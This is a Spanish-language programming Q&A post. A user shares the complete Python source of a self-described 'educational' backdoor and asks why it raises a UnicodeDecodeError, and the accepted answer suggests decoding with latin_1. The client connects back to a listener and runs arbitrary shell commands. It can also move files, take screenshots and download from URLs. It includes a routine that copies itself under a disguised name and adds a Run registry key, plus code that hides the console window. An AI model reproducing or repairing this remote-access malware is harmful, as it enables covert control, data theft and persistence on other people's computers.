# Error en la codificaion de bytes a str

Tags: python-3.x

## Estoy haciendo una backdoor con fines educativos claro, la cosa es que dentro de todo ese rollo de código, me falala mucho la codificacion a cada rato. El error creo yo que es en el modulo del cliente en el metodo shell en el condicional else, donde esta la variable execute que es la salida del subproces.Popen(). "repito, creo yo ahi es el error", desde luego pido lo prueben y me colaboren a solucionar y desde luego entender el porque del error de codificacion. (eso de las codificaciones no las entiendo muy bien, agradeceria me explicaran eso.)

El primer fragmento de código corresponde al servidor y el segundo fragmento al cliente.

El error básicamente es un UnicodeDecodeError, igual cuando lo ejecuten podran ver el error mas claramente.

agradezco su atencion, muchas gracias por su atención.

```
# !/usr/bin/env python
# -*- coding: utf-8 -*-

import base64
import socket

__all__ = ['ADDRESS','PORT']

ADDRESS = 'localhost'
PORT = 7777

class Servidor():
    def __init__(self):
        self.address = ADDRESS
        self.port = PORT
        self.server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

    def listen(self):
        self.server.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
        self.server.bind( (self.address,self.port) )
        self.server.listen(1)
        print("\nWaiting for connection...")
        self.obj_cliente,self.info_obj_cliente = self.server.accept()
        print(f"Connection established with {self.info_obj_cliente[0]}")
        #server.close()

    def shell(self):
        shell = self.obj_cliente.recv(1024)
        shell = shell.decode("utf-8")
        count = 0
        while True:
            comando = input(f"\n{shell}> ")

            if comando == "exit":
                self.obj_cliente.send(comando.encode("utf-8"))
                break

            elif comando == "":
                pass

            elif comando[:2] == "cd":
                self.obj_cliente.send(comando.encode("utf-8"))
                answer = self.obj_cliente.recv(1024)
                answer = answer.decode("utf-8")
                shell = answer

            elif comando[:8] == "download":
                self.obj_cliente.send(comando.encode("utf-8"))
                with open(comando[9:], mode = "wb") as file_download:
                    datos = self.obj_cliente.recv(1000000)
                    file_download.write(base64.b64decode(datos))

            elif comando[:6] == "upload":
                self.obj_cliente.send(comando.encode("utf-8"))
                with open(comando[7:],mode = "rb") as file_upload:
                    self.obj_cliente.send(base64.b64encode(file_upload.read()))

            elif comando == "screenshot":
                self.obj_cliente.send(comando.encode("utf-8"))
                with open(f"monitor-{count}.png",mode = "wb") as screen:
                    data = self.obj_cliente.recv(1000000)
                    data_decode = base64.b64decode(data)

                    if data == "error":
                        print("\nNo se pudo tomar la captura de pantalla.")
                    else:
                        screen.write(data)
                        print("\nCaptura tomada con exito.")
                        count += 1

            else:
                self.obj_cliente.send(comando.encode("utf-8"))
                answer = self.obj_cliente.recv(30000)
                answer = answer.decode("utf-8")
                if answer == "1":
                    pass
                else:
                    print(answer)

if __name__ == '__main__':

    init = Servidor()
    init.listen()
    init.shell()
    init.server.close()


# !/usr/bin/env python
# -*- coding: utf-8 -*-

from servidor import *
import socket
import os
import subprocess
import base64
import requests
import mss
import time
import shutil
import win32console
import win32gui
import sys

#ventana = win32console.GetConsoleWindow()
#win32gui.ShowWindow(ventana,0)

class Cliente():
    def __init__(self):
        #self.persistencia()
        self.cliente = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

    def persistencia(self):
        location = os.environ["appdata"] + r'\windows32.exe'
        if not os.path.exists(location):
            shutil.copyfile(sys.executable,location)
            subprocess.call(r'reg add HKCU\Software\Microsoft\CurrentVersion\Run /v backdoor /t REG_SZ /d "' + location + '"',shell = True)

    def connection(self):
        while True:
            time.sleep(5)
            try:
                self.cliente.connect( (ADDRESS,PORT ) )
                self.shell()
            except:
                self.connection()

    def root_check(self):
        try:
            check = os.listdir(os.sep.join([os.environ.get("SystemRoot",r"C:\windows"),'temp']))
        except:
            self.admin = "\nNo eres usuario root."
        else:
            self.admin = "\nEres usuario root."

    def screenshot(self):
        screen = mss.mss()
        screen.shot()

    def download_file(self,url):
        consulta = requests.get(url)
        nombre_archivo = url.split("/")[-1]
        with open(nombre_archivo,mode = "wb") as file_browser:
            file_browser.write(consulta.content)

    def shell(self):
        send_shell = os.getcwd()
        self.cliente.send(send_shell.encode("utf-8"))
        while True:
            answer = self.cliente.recv(1024)
            answer = answer.decode("utf-8")

            if answer == "exit":
                break

            #elif answer[:2] == "cd" and len(answer) > 2:
            elif answer[:2] == "cd":
                os.chdir(answer[3:])
                resultado = os.getcwd()
                self.cliente.send(resultado.encode("utf-8"))

            elif answer[:8] == "download":
                with open(answer[9:],mode = "rb") as file_download:
                    self.cliente.send(base64.b64encode(file_download.read()))

            elif answer[:6] == "upload":
                with open(answer[7:],mode = "wb") as file_upload:
                    datos = self.cliente.recv(1000000)
                    datos = datos.decode("utf-8")
                    file_upload.write(base64.b64decode(datos))

            elif answer[:7] == "browser":
                try:
                    self.download_file(answer[8:])
                    self.cliente.send("\nArchivo descargado correctamente.".encode("utf-8"))
                except:
                    self.cliente.send("\nOcurrio un error en la descarga.".encode("utf-8"))

            elif answer == "screenshot":
                try:
                    self.screenshot()
                    with open("monitor-1.png",mode = "rb") as screen:
                        self.cliente.send(base64.b64encode(screen.read()))
                    os.remove("monitor-1.png")
                except:
                    self.cliente.send(base64.b64encode("error"))

            elif answer[:5] == "start":
                try:
                    subprocess.Popen(answer[6:],shell = True)
                    self.cliente.send("\nPrograma iniciado con exito.".encode("utf-8"))
                except:
                    self.cliente.send("\nNo se puedo iniciar el programa.".encode("utf-8"))

            elif answer == "root":
                try:
                    root_check()
                    self.cliente.send(self.admin.encode("utf-8"))
                except:
                    self.cliente.send("\nNo se pudo realizar esta tarea.".encode("utf-8"))

            else:
                execute = subprocess.Popen(answer,shell = True,stdout = subprocess.PIPE,
                    stderr = subprocess.PIPE,stdin = subprocess.PIPE)

                resultado = execute.stdout.read()+execute.stderr.read()

                if len(resultado) == 0:
                    self.cliente.send("1".encode("utf-8"))
                else:
                    self.cliente.send(resultado.encode("utf-8"))

if __name__ == '__main__':
    init = Cliente()
    init.connection()
    init.cliente.close()
```

Comment: al parecer esperass recibnit algun payload binario en tu socket, del puerto 7777, decificarlo a utf-8, y asi como viene, ejecutarlo con popen() o run(), presumiblemente con los privilegios heredados del proceso python3 done corre el interpretador que ejecuta tu codigo, vdd?

Buena idea, excepto que la implementación de popen por si misma solo ejecuta comandos atraves de un shjell subyacente, es por elo que debes convertir a UTF-8 lo que le vayas a pasar a ese shwll: despues de todo sonsolo comandos ejeutqdos por el shelll. 

tienes un ejemplo del pàyload?

Answer (score 0, accepted):

puedes hacerlo asi:

cambiado encode **"utf-8"** por el codec  **"latin_1"** o su alias **"ISO-8859-1"**

```
texto_plano = xd.decode("ISO-8859-1")
```

referencia [codecs](https://docs.python.org/3/library/codecs.html#standard-encodings)